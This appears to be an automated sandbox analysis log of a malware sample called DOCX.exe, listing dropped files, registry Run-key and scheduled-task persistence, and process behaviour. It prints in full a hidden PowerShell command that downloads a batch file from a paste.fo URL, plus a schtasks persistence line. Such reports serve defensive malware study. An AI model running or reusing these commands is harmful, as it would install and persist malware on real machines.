Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\~$cache1

Jump to dropped file

Tries to download and execute files (via powershell)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"			Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File created: C:\ProgramData\Synaptics\RCX1FC6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File created: C:\Users\user\Desktop\._cache_DOCX.exe	Jump to dropped file
Source: C:\Users\user\Desktop\._cache_DOCX.exe	File created: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe	Jump to dropped file
Source: C:\ProgramData\Synaptics\Synaptics.exe	File created: C:\Users\user\Documents\~$cache1	Jump to dropped file
Source: C:\Program Files\7-Zip\7z.exe	File created: C:\Users\user\Downloads\DOCX.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File created: C:\ProgramData\Synaptics\RCX1FC6.tmp			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File created: C:\ProgramData\Synaptics\Synaptics.exe			Jump to dropped file

Source: C:\ProgramData\Synaptics\Synaptics.exe

File created: C:\Users\user\Documents\~$cache1

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1

Source: C:\Users\user\Desktop\._cache_DOCX.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGWEKK.lnk

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior
Source: C:\Users\user\Desktop\._cache_DOCX.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGWEKK.lnk

Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TGWEKK
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TGWEKK

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006AF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	46_2_006AF78E
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006F7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	46_2_006F7F0E
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0041F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	60_2_0041F78E
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00467F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	60_2_00467F0E

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006B1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

46_2_006B1E5A

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
